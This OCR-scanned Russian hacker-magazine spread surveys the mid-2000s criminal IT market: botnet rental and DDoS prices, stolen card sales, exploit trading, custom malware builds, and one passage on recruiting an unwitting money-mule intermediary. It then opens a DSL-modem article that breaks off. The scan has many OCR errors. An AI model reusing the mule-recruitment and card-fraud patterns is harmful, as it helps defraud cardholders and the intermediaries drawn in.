НЫЕ С НЕПРАВОМЕРНЫМ ДОСТУПОМ К КОМПЬЮТЕРНОЙ ИНФОРМАЦИИ. СЛЕДУЮЩАЯ 
ПО ОБЪЕМУ ГРУППА ПРЕСТУПЛЕНИЙ — НАПРАВЛЕННЫЕ НА «СОЗДАНИЕ, ИСПОЛЬЗО- 
ВАНИЕ И РАСПРОСТРАНЕНИЕ ВРЕДОНОСНЫХ ПРОГРАММ ДЛЯ ЭВМ» |$АМовУво\ A.M. 


Активно развиваясь, компьютерное криминальное 
общество уже сформировало свой виртуальный 
криминальный мир. Если буквально несколько лет 
назад большинство преступлений в сфере ИТ со- 
вершалось подростками и студентами, причем 
часто просто из-за озорства, то теперь выросшие 
подростки осознали (согласно статистике отдела 


«К», 60% правонарушителей — лица от 20-ти до 
35-ти лет, и только 24% — лица до 20-ти лет), что 
на этом можно зарабатывать деньги. Согласно 
данным Reuters, уже в 2004 году объем средств, 
«заработанных» киберпреступниками, составил 
$105 млрд. и тем самым превысил доход нарко- 
торговли. 


payhash 
(СВЕТЛАЯ СТОРОНА) 


ЧЕЛОВЕК, КОТОРЫЙ НЕ НУЖДАЕТСЯ 
В ПРЕДСТАВЛЕНИИ :) 


Отмечу, что в группу риска (группа прес- 
тупников-профессионалов) попадают сов- 
сем не ИТ-специалисты, которые дожили 
до 25-35 лет и постоянно работают (60% 
преступников). Наоборот. Группу риска 
составляют молодые люди от 15-ти до 25- 
ти лет. Также хотелось бы уточнить дан- 
ные «Информзащиты» о шести-восьми 
группах профессионалов: на самом деле 
их гораздо больше, часто преступники ра- 
ботают по одиночке (если, конечно, не 
считать партнеров, которые приватно об- 
мениваются информацией, — нельзя наз- 
вать их общение группой). Конечно же, ки- 
берпреступники объединяются, но не из-за 
стремления заработать — они только об- 
мениваются информацией об уязвимостях 
(многое зависит и от направления группы). 
Если брать тему написания и продажи 
эксплойтов, то тут присутствуют две части: 
1) публикуемые (паблик); 2) для приватно- 
го (коммерческого) использования. 

Оба вида направлены на взлом системы 
потребителями, хотя, насколько мне изве- 
стно, авторы редко используют свои прог- 
раммы для целевого масштабного взлома 
системы. Обычно «товар» продают конеч- 
ному клиенту, и тот извлекает из него вы- 
году (разводит ботнет, ворует информа- 
цию — вся его работа относится к «трафи- 
ку»). Таких людей сложно отнести к кате- 
гории любителей: нужно еще суметь гра- 
мотно разводить работу «по трафику»;). 


Логично, что дальнейшее развитие компьютерной 
преступности повлекло за собой появление особо- 
ro «теневого» ИТ-рынка, существование которого 
до сих пор оспаривалось экспертами, но было до- 
казано зафиксированными фактами продажи кри- 
минального ИТ-товара. Так, в декабре 2004 года 
«Лаборатория Касперского» опубликовала дан- 
ные о появившихся сообщениях по поводу прода- 
жи эксплойта для уязвимости Windows Meta File. 

Так или иначе, будущее криминального ИТ- 
рынка уже определенно: он уже формируется и в 
дальнейшем будет только развиваться, а вирту- 
альный товар уже стал серьезным средством для 
совершения реальных преступлений. 

Очень сложно и, скорее, даже невозможно 
дать точное и подробное описание этого рынка, 
где были бы классифицированы группы товаров, 
определены объемы продаж и сложившиеся сег- 
менты. Можно дать лишь приблизительные оценки 
и описать общую направленность развития рынка. 
В этой статье мы попытаемся назвать основные 
группы товаров, их стоимость и участников рынка. 
Итак, начнем... 
> ботнеты. Сегодня одним из наиболее востре- 
бованных товаров «теневого» рынка являются 
ботнеты, или ботсети, или (еще одно название) — 
зомби-сети. Востребованность подтверждается 
исследованиями некоторых фирм, например 
компании Webroot, которая специализируется 
на борьбе с вредоносными программами: по ее 
данным, количество «шпионских программ» 
(SpyWare) за 2005 год увеличилось в три раза, 
что свидетельствует в пользу востребованности 
SpyWare-pecypcos. 

В течение прошедшего года было обнаруже- 
ны 400 тысяч сайтов, распространяющих «шпион- 
ские программы». Их общее количество достигло 
120 тысяч, тогда как в начале 2005 года ограничи- 
валось 40 тысячами. 

Собственно термин «ботнет» происходит от 
английского жаргонного слова «botnet» и приме- 
няется к сети, состоящей из некоторого количест- 
ва хостов, зараженных «ботами» — автономным 
программным обеспечением, которое скрытно ус- 
танавливается на компьютере жертвы и позволяет 
злоумышленнику выполнять некие действия с за- 
раженной машиной. Как правило, компьютер ста- 
новится полностью подконтрольным, отсюда и его 
название — «зомби». Располагая группой таких 
компьютеров, злоумышленник получает пол- 
ностью управляемую зомби-сеть. Известны случаи 
выявления сетей, состоящих из 10 000 (пример — 
сеть, выявленная известной норвежской телеком- 
муникационной компанией в 2004 году) и даже 
100 000 компьютеров (обнаружена голландскими 
властями в 2005 году). 

Как правило, собственно ботсеть не продает- 
ся — продаются только услуги, оказываемые ей. В 
некоторых случаях ботсеть «сдается в аренду», то 
есть некоторое время используется заказчиком в 
произвольных целях. 


Максим Эмм 


(СВЕТЛАЯ СТОРОНА) 
ЗАМЕСТИТЕЛЬ ДИРЕКТОРА ПО КОНСАЛ- 
ТИНГУ КОМПАНИИ «ИНФОРМЗАЩИТА» 


Список услуг, оказываемый зомби-сетями, 
велик. С помощью ботсетей можно осу- 
ществлять разнообразные операции: 


—` ОРГАНИЗАЦИЯ DDOS-ATAK 
(DENIAL-OF-SERVICE ATTACKS); 


“ СОЗДАНИЕ ЦЕПИ SMTP RELAY, 
ЖИЗНЕННО НЕОБХОДИМОЙ ДЛЯ 
РАССЫЛКИ СПАМА; 


—` ПОЛУЧЕНИЕ ПОЛЬЗОВАТЕЛЬСКОГО 
ТРАФИКА, НУЖНОГО, НАПРИМЕР, 
ДЛЯ ПОДНЯТИЯ ИНДЕКСА ЦИТИРУ- 
ЕМОСТИ М/ЕВ-САЙТА ИЛИ ДЛЯ 
МОШЕННИЧЕСТВА С ПРОСМОТРОМ 
РЕКЛАМЫ; 


— КРАЖИ СЕРИЙНЫХ НОМЕРОВ 
ПРОГРАММНОГО ОБЕСПЕЧЕНИЯ 
С ЗАРАЖЕННЫХ МАШИН; 


— КРАЖА ФИНАНСОВОЙ 
ИНФОРМАЦИИ; 


— КРАЖА АУТЕНТИФИКАЦИОННОЙ 
ИНФОРМАЦИИ ПОЛЬЗОВАТЕЛЕЙ; 


™ ОБЕСПЕЧЕНИЕ АНОНИМНОСТИ. 


Вот далеко не полный список возможностей 
ботсетей. 


На теневом виртуальном рынке основной доход 
получают именно путем использования бот-сетей. 
Противодействовать таким сетям очень сложно. 
Достаточно крупную ботсеть можно создать при- 
мерно за неделю-две! Однако на ее обнаружение 
и нейтрализацию затрачиваются месяцы. Опреде- 
лить владельца зловредной ботсети («пастуха»), 
если и возможно, то крайне сложно, так как он ис- 
пользует сложную цепочку посредников, часть из 
которых, возможно, даже не подозревает о своей 
причастности. 

Стоимость услуг, оказываемых бот-сетью, 
колеблется в достаточно большом диапазоне. 
Например, стоимость DDoS сильно зависит от 
уровня атакуемого узла, требуемой величины ата- 
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БЕЗОПАСНОСТЬ ПРИЛОЖЕНИЙ ДЛЯ КПК, 


REVERSER 


Сложно добавить что-то существенное к 
сказанному, однако помимо всех упомяну- 
тых способов нечестного заработка хоте- 
лось бы отметить банальный взлом прог- 
раммного обеспечения за деньги, как ни 
странно, очень популярный. Адепты «крэ- 
керских» порталов рвутся на этот рынок, 
но, к счастью, до финиша доходят далеко 
не все — закон природы. 


Жертвами преступлений такого рода, как 
правило, становятся узкоспециализиро- 
ванные (часто зарубежные) приложения 

с дорогой лицензией. Здесь мы имеем де- 
ло с профессионалами, на которых заказ- 
чики выходят через форумы или IRC-KaHa- 
лы соответствующей тематики. Цена услу- 
ги, как правило, составляет около 25% от 
стоимости самой программы, конечно же, 
при цене за лицензию более $30. 


Естественно, что релизы для таких прог- 
рамм не становятся общедоступными, 

а если и распространяются, то только сре- 
Ди «своих», в привате. 


С другой стороны, те же самые люди 
привлекаются разработчиками, только 
не для взлома, а для создания защиты 
программных продуктов. Со временем 
ex-crackers полностью переходят на 
светлую сторону силы и, как Алексей 
Солодовников (автор ASProtect), обеспе- 
чивают надежный рубеж обороны от по- 
пыток исследовать исполняемый код. Такой 
вот круговорот. 


ки и, соответственно, от величины зомби-сети. 
Атаки этого вида на информационные ресурсы 
крупных вендоров стоят недешево: от $50 до 300 в 
минуту, для осуществления атаки используются 
ботсети с 50 000-150 000 хостов (по данным из 
анонимных источников). Цена атаки в расчете на 
одни сутки составит от $72 000 до 432 000. Естест- 
венно, не любой «карман» осилит такие затраты, в 
то же время только очень серьезные ресурсы нав- 
лекают на себя эти масштабные атаки: электрон- 
ные платежные системы, онлайн-казино, трейдин- 
говые системы. Ущерб от простоев в подобных ре- 
сурсах во много раз превышает затраты на осуще- 
ствление соответствующих атак. Подмоченная ре- 
путация системы только увеличит убытки. Однако 
недоброжелатель, устроивший этот «провал», 
вполне окупит свои затраты. 

Приведу еще одно объяснение соотношению 
затрат на атаки с помощью ботсетей. Злоумыш- 
ленник, который проводит подобную атаку, риску- 
ет потерять контроль над зомби-сетью (будут утра- 
чены уникальность зловредного ПО и контроль 
над самой зомби-сетью). 

DDoS-ataku на информационные ресурсы 
предприятий малого и среднего бизнеса исполь- 
зуют сети от 300 хостов и стоят существенно де- 
шевле: от $500 в сутки. Реальность обстоит так, 
что атакующий, если он обладает определенны- 
ми навыками и собирает бюджет до $500, может 
отключить от сети интернет практически любую 
сеть среднестатистической организации на тер- 
ритории РФ, а также нанести ей некоторый фи- 
нансовый ущерб. 

Тест по генерации зловредного сетевого 
трафика с трех ботов за период времени 1200 се- 
кунд (20 минут) показал, что три бота способны 
породить зловредный трафик объемом 4 Гб. Сле- 
довательно, 300 зомби породят трафик 400 Гб за 
те же 20 минут. 

Типичная организация пользуется ежеме- 
сячным тарифом с каналом 2 Мбит/с, то есть 
0,25 Мбайт/с. Подсчитываем количество трафика 
и получаем за 1 час = 0,25*1200= 300 Мб. 

Превышение каждого мегабайта стоит $0,04, 
то есть за 1 Гб организация выплатит провайдеру 
$40, за 400 Гб — до $16 000. 

Услуги по генерации пользовательского 
трафика обойдутся заказчику в $150 за 1000 заг- 
рузок. Например, зомби-сеть получает команду 
выполнить загрузку некого html[O]-cbaina 1000 
раз после предварительного тематического зап- 
роса в службу интернет-каталогов или поисковую 
систему. В результате будет получен пользова- 
тельский трафик, пригодный для повышения ин- 
декса цитируемости сайта в поисковых системах 
или получения средств за просмотр рекламы (ес- 
ли оплата зависит от количества показов). Здесь 
могут быть интересны ботсети с географическим 
расположением ботов: часто интересы заказчика 
направлены на конкретные географические зо- 
ны. Собственно, рынок рекламы в интернете — 


достаточно «раздутая» вещь. Рекламодатели 
часто ожидают от нее неоправданно много. Кро- 
ме того, не стоит забывать о непорядочных орга- 
низациях, пользователями рекламы которых час- 
то являются боты, а не люди. Такая проблема 
достигла мирового масштаба. 

Следующий покупаемый товар на теневом 
рынке — это... 
> пластик. Очень хорошо продается так назы- 
ваемый «пластик», или «картон» — списки номе- 
ров банковских карт с данными о владельце, кото- 
рые пользуются высоким спросом среди интернет- 
мошенников и активно используются ими. По все- 
му миру интернет-мошенников становится все 
больше. По оценкам Федеральной торговой ко- 
миссии США, этот вид преступлений занимает до- 
лю 39% от общего числа интернет-афер, а потери 
пострадавших в 2004 году составили $265 млн. 
Эти данные почерпнуты из официальных источни- 
ков, реальность же удручает нас еще больше. 

Как правило, профессионалы используют 
«пластик» не для обналичивания средств, а для 
оплаты виртуальных услуг какого-либо рода. Об- 
наличивание — очень сложная и рискованная 
процедура, не всякий готов взять на себя этот 
риск. Когда возможность проводить электронные 
платежи только появилась, краденые номера 
кредиток использовали для обналичивания денег 
или покупки реальных товаров на адрес, напри- 
мер, «бабушки». Сейчас подобные махинации ка- 
жутся довольно глупыми — в основном ими зани- 
маются непрофессионалы. Оплата виртуальных 
услуг проще, менее рискованна и исключает 
собственно необходимость пользоваться цепоч- 
кой посредников. Достаточно одного подставного 
лица, причем посредник может даже не подозре- 
вать о том, в чем он участвует. 

Следующим способом, к примеру, вербуют 
подставное лицо. Злоумышленник, находясь в 
России, обращается к кому-нибудь, скажем, в 
США. Представляется бизнесменом из Китая и 
выдвигает предложение: «У меня есть клиенты 
в США, я предоставляю им услуги. Но нужен 
собственный представитель в США, который 
мог бы собрать платежи наличными или чеками 
и в дальнейшем перевести их на мой счет в Рос- 
сию. Давайте вы будете мои представителем. 
Все, что от вас потребуется, — собирать деньги 
и переправлять их мне, разумеется, оставляя 
определенный процент себе». Получив согла- 
сие, преступник указывает счет из реквизитов 
китайской компании, которая принимает от него 
платеж за хостинг. Конечно же, владелец укра- 
денного номера обнаруживает подозрительный 
платеж и заявляет о нем, отзывает платеж, на 
что, однако, тратит не менее 30-ти суток. В тече- 
ние этого времени злоумышленник пользуется, 
например, безлимитным хостингом, успевает 
разместить на нем огромную массу вредонос- 
ных программ и заразить им множество компью- 
теров. Разыскать подставное лицо не составит 


никакого труда, HO в результате не будет полу- 
чено никакой информации, которая помогла бы 
найти злоумышленника. 

> уязвимости. Продают также найденную (и 
еще неопубликованную) информацию об уязвимос- 
TAX, или, как их еще называют, эксплойтах (exploits). 
Впервые случаи продажи уязвимости были зафик- 
сированы и официально обнародованы еще в кон- 
Це 2004 года (имеются в виду, конечно, официаль- 
но опубликованные :) — прим. Dr. Klouniz). «Лабо- 
ратория Касперского» опубликовала информацию 
о том, что в середине декабря 2004 года зафикси- 
рована продажа российскими хакерами эксплойта 
для уязвимости в \/МЕ-файлах. Первоначально 
эксплойт был выставлен по цене $4 тыс., HO, по со- 
общениям анонимных источников, в дальнейшем 
цену снизили до $200. Позже сообщалось, что пос- 
ле продажи эксплойта появилась целая серия тро- 
янских, шпионских и рекламных программ, пост- 
роенных на этой уязвимости. Эксперты по безо- 
пасности узнали об уязвимости уже после прове- 
дения первых успешных атак. Только тогда (!) ин- 
формацию передали в Microsoft, через несколько 
дней были выпущены исправления для ошибки. 

Как правило, уязвимости применяются для 
построения ботсетей — иные цели преследуют ре- 
же. Такая уязвимость стоит на порядок больше, 
чем небольшая зомби-сеть, именно потому что 
позволяет построить большую ботсеть за корот- 
кий промежуток времени. Увы, не каждый, кто об- 
наружил уязвимость, спешит заявить о ней компа- 
нии-производителю или всему миру. Есть профес- 
сионалы в области ИТ, которые, к сожалению, ис- 
пользуют эту информацию в своих корыстных це- 
лях. Кроме того, часто уязвимость обнаруживает- 
ся именно после осуществления ее эксплуатации. 
Компании-производители тоже отнюдь не спешат 
оглашать подобные находки. Так или иначе, на 
разработку обновления уходит определенное ко- 
личество времени, поэтому регулярность обновле- 
ний не спасает от ряда уязвимостей, «вакцины» от 
которых еще не создано. 

В этой группе товаров пользуются хорошим 
спросом серверные уязвимости, предназначенные 
для выполнения произвольного кода или java- 
скрипта: взламывается крупный и посещаемый 
ресурс, далее он используется для заражения 
всех его клиентов вредоносным программным 
обеспечением или клиентами ботсетей. Таким об- 
разом производятся атаки на клиентов ресурса. 
Отмечу, что в современном хакерском мире по- 
добные случаи сформировали целую тенденцию. 
Если еще несколько лет назад хорошо оплачивал- 
ся и был востребован взлом конкретного сервера, 


Докучаев Дмитрий 
aka Forb 


(ТЕМНАЯ СТОРОНА) 

ТРИЖДЫ КРАСНОЗНАМЕННЫЙ АВТОР 
ЖУРНАЛА «ХАКЕР» И ВООБЩЕ 
СТРАШНЫЙ ЧЕЛОВЕК ;) 


На черном рынке можно продавать все 
что угодно: от безобидных баз по кредит- 
кам до реального пластика с залитым на 
него дампом рабочей кредитной карты. 
Соответственно, доход, который нелегалы 
получают от продажи настоящих карточек, 
будет намного выше. Самые популярные 
вещи для продажи — скорее, базы по кре- 
дитным картам (одна кредитная карта в 
БД стоит $1) и всякие трояны, которые 
загружают на уязвимые сайты. Также есть 
«черные» программисты: они пишут мно- 
гокомпонентные эксплойты для разных 
операционных систем, а затем продают 
свои проекты по сходной цене (обычно от 
$200 до 1000). 


Хозяева ботнетов предлагают не только 
услуги по DDoS-atakam: ботнеты прекрас- 
но приспособлены для спама и анонимно- 
го прокси-сервера. Обязательно найдется 
гениальный программист, который напи- 
шет целый ботнет, а продукт продадут по 
сходной цене от $ О до 20 000. 


Что насчет продажи «живого» товара? 
Распространена услуга по предоставления 
дропов: иностранец-посредник высылает 
товар или обналичивает крупный счет. 
Кроме того, теперь не нужно беспокоиться 
О «разводе» человека на незаконную опе- 
рацию — дроповод сделает все сам. Конк- 
ретную цену за один дроп не указывают, 
все работают под проценты от высылае- 
мого товара или от обналиченных денег. 


Количество преступлений, совершенных в России за последние три года (по данным ГИС МВД) 


Количество преступлений 


2003 2004 2005 


7053 13723 14810 


Прирост по отношению к предыдущему году, % 94,6 TAS 


Woz3qk 


(СВЕТЛАЯ СТОРОНА) 
ЕХ-НАСКЕВ (НЫНЕ — ИНФОРМАЦИОННАЯ 
БЕЗОПАСНОСТЬ) 


Уже давно киберпреступность перестала 
быть баловством и переместилась в биз- 
нес. Все больше молодых людей концент- 
рируют свои навыки и умения в преступле- 
ниях этой сферы. На самом деле немногие 
из новоиспеченных хакеров совершают 
преступления ради славы — все больше и 
больше молодых людей пытаются быстро 
нажиться, на что их подталкивает низкая 
оплата знаний: многие спецы работают 
простыми админами и системотехниками, 
специалисты высокого уровня мало вос- 
требованы. 


Что касается данных, приведенных в 
статье... Действительно DDoS процветает, 
но здесь были указаны несколько завы- 
шенные суммы за DDOS крупных порта- 
лов. Количество хакерских групп намного 
больше, чем указано: группировок, кото- 
рые работают «по-крупному», может быть, 
действительно шесть-восемь, но группы 
не стремятся засветить себя и, соответ- 
ственно, о них мало кто знает. Однако 
групп среднего звена, не менее опасных, 
насчитывается около 40. Не стоит забы- 
вать и о волках-одиночках, их немало. 
Планку «хакеры с 20-ти лет» я бы опустил 
на два года. 


Упомяну еще один вид преступности — 
порно в сети. Современный порнобизнес в 
Сети стремительно развивается, зараба- 
тывает немалые деньги, и именно порноба- 
роны связаны с львиной долей заказов на 
взлом :) — украсть выгоднее, чем платить. 


Между прочим, такой способ заработка 
опасен, многие совсем юные парни попа- 
дают в руки управления «К». Любая при- 
частность в будущем повлияет на трудо- 
устройство и может кардинально изме- 
нить жизнь в худшую сторону. Так что 

я бы посоветовал искать честный зара- 
боток, чтобы не идти на риск потерять 
больше, чем нажил. 
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то сейчас произошло смещение к атакам на кли- 
ента, а взлом серверов, как правило, отодвигает- 
ся на промежуточный этап. 

>» — вредоносное программное обеспечение. Ви- 
русы, шпионские программы или клиенты ботсе- 
тей представляют ряд программ, которые прев- 
ращают компьютер в «зомби». Интернет давно 
завален всевозможным вирусным и шпионским 
программным обеспечением, распространяе- 
мым совершенно бесплатно. То же самое отно- 
сится к крэкам. Подавляющее большинство про- 
давцов нелегальных копий получают генерато- 
ры ключей и программы для взлома именно из 
интернета. Однако специфическое и не массо- 
вое программное обеспечение требует уникаль- 
ного подхода, поэтому привлекает услуги про- 
фессиональных программистов, направленные 
на взлом продукта. 

В большей степени распространена разра- 
ботка и продажа шпионского и вредоносного прог- 
раммного обеспечения с целью его продажи. На 
соответствующих услугах даже специализируются 
программисты и их группы. Профессиональные 
программы, разработанные на заказ, уникальны и 
их воздействие гарантированно, поэтому и предс- 
тавляет ценность: есть гарантия того, что антиви- 
русные программы и системы поведенческого 
анализа не обнаружат такой продукт, в то время 
как о широко известных и распространяемых 
бесплатно программах почти всегда очень быстро 
осведомляются производители антивирусного 
программного обеспечения. Продается, естест- 
венно, не исходный код такой программы, а стати- 
ческий «билд» (build) — программный код, скомпи- 
лированный специально в соответствии с нуждами 
клиента и имеющий возможности, встроенные в 
программу по требованию заказчика, например 
IRC-KaHan, номер порта, протокол, через который 
происходит управление и т.п. 
> — базы данных. Спросом пользуются и всевоз- 
можные базы данных — от БД хостинговых компа- 
ний до финансовых БД, в том числе списки торго- 
вых и Е-Вау-аккаунтов. В общем, продается вся 
информация, которую перекупят заинтересован- 
ные люди или которой воспользуются мошенники. 
Ежемесячно возрастает количество мошенничес- 
ких операций, постоянно появляются все новые и 
новые схемы, они эволюционируют очень быстро. 
Покупка базы обходится в самые разные суммы 
(от 50-ти до нескольких тысяч долларов) и зависит 
от востребованности данных, количества потенци- 
альных покупателей, уникальности и риска, свя- 
занного с получением доступа к информации. БД 
сбываются исключительно через цепочки посред- 
ников, причем часто продавцы стремятся миними- 
зировать личный контакт с покупателем, поэтому 
используют электронные спам-рассылки. Навер- 
няка ты не раз получал спам-письма: «Продается 
база. Всего за $50-300». 

Таков на сегодняшний день основной товар 
этого рынка. Теперь несколько слов об участниках. 


Андрей 
Семенюченко 


(СВЕТЛАЯ СТОРОНА) 
ЭКСПЕРТ ПО ИНФОРМАЦИОННОЙ 
БЕЗОПАСНОСТИ 


Безусловно, число !Т-преступлений посто- 
янно растет. Конечно, реальное количест- 
во правонарушений гораздо больше офи- 
циально зарегистрированных, хотя бы по- 
тому что многие жертвы просто не хотят 
афишировать факт взлома — никто на 
станет компрометировать самого себя. Ки- 
берпреступность стала уделом профессио- 
налов, а не любителей, поэтому она и 
процветает. Кроме того, сейчас мы имеем 
дело не только с высококвалифицирован- 
ными специалистами, но и с четкой орга- 
низацией процесса преступления. Вот 
только некоторые цифры. За 2004-2005 
годы было арестовано несколько десятков 
хакерских групп, в сумме — 100 человек. 
По данным организации Сотрщег 
Economics, ущерб, нанесенный мировой 
экономике только в 2005 году, составил 
более $20 млрд. 


Однако уберечься от атак извне все-таки 
можно. Простые пользователи должны 
соблюдать элементарные меры безопас- 
ности и не соблазняться халявой! 90% крэ- 
ков содержат трояны, а многим владель- 
цам порносайтов нужны не паршивые два 
доллара посетителя, а данные кредитной 
карты, с помощью которых он вытянет все 
ее содержимое. Не забудем, что защита 
должна быть комплексной. Помни о мо- 
бильных решениях! Часто получается так, 
что пользователь смартфона начинает по- 
думывать об установке антивируса только 
после того, как его любимец вдруг стал 
звонить сам по себе по совершенно «ле- 
вым» телефонным номерам. 


> участники. Интересно, что рассматривае- 
мый нами рынок достаточно замкнут, основным 
потребителем и производителем большинства 
его товаров и услуг становятся профессионалы в 
области ИТ. Еще интереснее то, что на «тене- 
вом» ИТ-рынке махровым цветом цветет мошен- 
ничество и обман между участниками. Именно 
поэтому профессиональные «добросовестные» 
участники рынка создают white- и Маск-листы — 
СПИСКИ «честных» и недобросовестных произво- 
дителей товаров и услуг. 

Кстати о людях. По данным управления 
«К», типичная личность киберпреступника выг- 
лядит следующим образом: лицо от 20-ти до 35- 
ти лет, имеет высшее образование и постоянную 
работу. Согласно той же статистике, более 2/3 
преступлений, в которых применяются информа- 
ционные технологии, совершают сотрудники, 
состоящие в потерпевшей организации, или 
бывшие работники. 
> производители. Логично было бы разделить 
их на две группы: профессионалы и любители. 

Профессионалы — это группа хорошо подго- 
товленных специалистов, обладающих хорошими 
знаниями и практическими навыками в области 
информационной безопасности и компьютерных 
систем. Представители этой группы не заинтере- 
сованы в завоевании славы, праздное любопыт- 
ство не свойственно им. Их единственный мотив — 
получение денег. Профессионал нарушает закон, 
чтобы заработать на хлеб. 

Оценить количество членов этой группы 
сложно. В России, по оценкам экспертов компании 
«Информзащита», действует предположительно 
шесть-восемь высокопрофессиональных групп. 

Любители — малоопытные люди, иногда 
студенты и подростки — руководствуются самы- 
ми разными мотивами, часто просто пытаются 
заявить о себе или «пошалить». Именно они сос- 
тавляют основной процент пойманных кибер- 
преступников. 
> потребители рынка достаточно разношер- 
стны. Как уже указывалось, потребителями явля- 
ются в основном профессионалы в области ин- 
формационных технологий (кардеры, спаммеры, 
пираты ит.д.). Однако конечными заказчиками не- 
которых услуг часто становятся люди, совершенно 
не соответствующие статусу ИТ-специалиста («За 
ваши деньги исполним любой ваш каприз»). 

Мотивы потребителей также распадаются на 
самый широкий спектр: чаще всего корысть, же- 
лание заработать мошенничеством или получени- 
ем преимущества в конкурентной борьбе. Совсем 
иная ситуация — жажда славы или мести, необхо- 
димость в обеспечении анонимности 

Р.$. И снова — от редакции :). То, что заказчи- 
ками услуг чаще становятся люди, близкие к IT, все- 
таки вероятнее. Конкуренты DDOoS’aAT конкурентов, 
кардеры прикупают картон у кардеров, хакеры толка- 
ют базы кардерам... И прочий круговорот в природе. 
В общем, мы за светлую сторону силы :) Aa 
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DSL 


анализ 


РАЗОРЯЕМ СКРЫТЫЕ 


ВОЗМОЖНОСТИ О$Е-МОДЕМОВ 


ПОСЛЕ НЕТОРОПЛИВОГО ГА! -УР-СОЕДИНЕНИЯ ПРОНЫРЛИВЫЙ 0$1-МОДЕМ КАЖЕТ- 
СЯ ЧУДОМ! ДАННЫЕ ЛЬЮТСЯ НА ЖЕСТКИЙ ДИСК СТРЕМИТЕЛЬНЫМ ГИГАБИТНЫМ 
ПОТОКОМ, НО... АППЕТИТ, КАК ВОДИТСЯ, ПРИХОДИТ ВО ВРЕМЯ ЕДЫ. ЧЕРЕЗ НЕКО- 
ТОРОЕ ВРЕМЯ ШИРИНЫ КАНАЛА НАЧИНАЕТ НЕ ХВАТАТЬ И ПОЯВЛЯЕТСЯ ЖЕЛАНИЕ 
ХОТЬ КАК-ТО РАСШИРИТЬ ЕГО, ЕСТЕСТВЕННО, БЕЗ ДОПОЛНИТЕЛЬНЫХ КАПИТАЛО- 


ВЛОЖЕНИЙ ГКРис КАСПЕРСКИ — АРГЕНТИНСКИЙ БОЛОТНЫЙ БОБЕР 


О$Е-ТЕХНОЛОГИИ МЕГАПОПУЛЯРНЫ В НАШЕ ВРЕМЯ. 
НАША ЗАДАЧА — ВЫРВАТЬ ИЗ НИХ ВСЕ, ЧТО МОЖНО 


Допустим, мы имеем качественный, правильно под- 
ключенный и настроенный ОЗ! -модем, работающий 
на пределе своих возможностей. Можем ли мы ра- 
зогнать его, увеличив пропускную способность хотя 
бы на треть? Ответ отрицательный! Если бы в самом 
деле такое было возможно, производители сделали 
бы это за нас! Однако ОЗЁ-модем, стабильно рабо- 
тающий на «паспортной» скорости, — достаточно 
редкое явление, если не сказать «уникальное». Мо- 
дему приходится работать в суровых условиях дикой 
природы, сражаясь с помехами, кривыми настройка- 
ми и прочими порождениями хаоса и энтропии. 
Если реальная скорость работы не соответ- 
ствует расчетной, необходимо проанализировать си- 
туацию, найти, где зарыта собака, и откопать ее ко 
всем чертям! В настойке DSL-mofemos в самом деле 
присутствует очень много черной магии, не описан- 
ной ни в сопроводительной инструкции, ни в доку- 
ментации. Магические заклинания рассеяны по все- 
му интернету, и чтобы собрать сакральные знания 
воедино, нужно очень много блуждать в темноте... 
Внушительная коллекция полезных советов 
лежит на http://spblan.narod.ru | а на www.adsinet.ru/commu- 


пну-рвр находится лучший технический форум, по- 


священный проблемам настройки О$Ё-модемов и 
прочего коммуникационного оборудования данно- 
го типа. Там же выложены ссылки на другие ре- 
сурсы сходной тематики. Как говорится, дорогу 
осилит идущий, а мы тем временем возьмем наш 
модем в руки и посмотрим, что такого можно со- 
творить с ним. Заранее предупреждаю: будет 
очень хорошо, если модем вообще не перестанет 
работать. Шутка! Расслабьтесь! Наши экспери- 
менты абсолютно безопасны! 

+> в коробке с DSL-mogemom обычно присут- 
ствует маленькая прямоугольная штучка (иногда 
встроенная в сам модем) с тремя выходами, кото- 
рые обозначаются Kak LINE, PHONE и МО- 
DEM/ADSL. Штучка называется ЗрИег, что в пере- 
воде с английского означает «расщепитель», 
«разделитель»: он разделяет входной сигнал (LI- 
МЕ) на низкочастотную составляющую (с которой 
работает телефон (РНОМЕ) или обыкновенный 
модем типа ZyXEL OMNI 56K Pro) и высокочастот- 
ную, предназначенную для О$Ё-модема. 


сою юое 


Рисунок 3. Характеристика линии LINE-ADSL- 
сплиттера от Siemens 


вене е 


Рисунок 4. Характеристика линии LINE-PHONE- 
сплиттера от Siemens 


соо ое 


Рисунок 5. Характеристика линии LINE-ADSL 
сплиттера от ZyXEL 


Рисунок 6. Характеристика линии LINE-PHONE 
сплиттера от ZyXEL 


Распределение частотного спектра 


ie} 4kHz 25.875kHz 


138kHz 


1104kHz 


PSTN Upstream 


В отличие от обыкновенного модема, который рабо- 
тает в узкой полосе частот, закачивающейся где-то в 
районе 4 КГц, ОЗЁ-модемы охватываю намного 60- 
лее широкий спектр (от 26 до 1104 КГц), что позволя- 
ет развивать мегабитные скорости на тех же самых 
каналах. (И практически тех же самых: требования к 
телефонной «лапше» значительно ужесточились, 
для максимальной скорости применяют качествен- 
ную витую пару протяженностью не более 5-10 км.) 
Исходящий поток (upstream) занимает нижнюю 
осьмушку спектра — от 26 до 138 КГц. Входящий 
поток (downstream) простирается от 138 до 1104 
КГц (на самом деле цифры весьма условны и 
варьируются от одного стандарта к другому). 
Таким образом, диапазон, отведенный исхо- 
дящему потоку, уступает входящему в восемь раз! 
Другими словами, О$Ё-модемы оптимизированы 
ДЛЯ «COCYHOB», то есть для тех, кто хочет только ка- 
чать, ничего не отдавая взамен. Конечно, можно по- 
строить домашний сервер на основе DSL-mogema, 
но... скорость отдачи будет составлять одну вось- 
мую от скорости приема, на которую модем, соб- 
ственно, и «рассчитан». На самом деле точное соот- 
ношение определяется качеством канала. Напри- 
мер, на моей телефонной линии модем принимает 2 
мегабита, а отдает 500 килобит, то есть исходящий 
поток меньше входящего всего в четыре раза. 

Вот и создавай корпоративный web/ftp-cep- 
вер на ОЗЁ-основе! Входящий поток остается 
практически незадействованным, а исходящий бу- 
квально «задыхается» от наплыва пользователей. 


Downstream 


По долгу службы вынужденные передавать боль- 
шие объемы данных по электронной почте или ftp 
(полиграфические изображения, макеты книг и 
т.д.), пользователи страдают не меньше других. 
Увы! Изменить соотношение частот методом 
паяльника и отвертки не получится: Стандарт не 
велит. Как минимум, придется перестроить ста- 
ционарное оборудование, установленное на АТС, 
а никто не позволит трогать его. 

Кстати, существуют и другие стандарты, их 
перечень и краткие характеристики приведены в 
таблице 1. Как видно, самым выгодным стандар- 
том для организации домашнего сервера оказы- 
вается Annex J ASDL2, однако его поддерживают 
далеко не все модемы и провайдеры. 

Однако вернемся к сплиттерам. Можно ли 
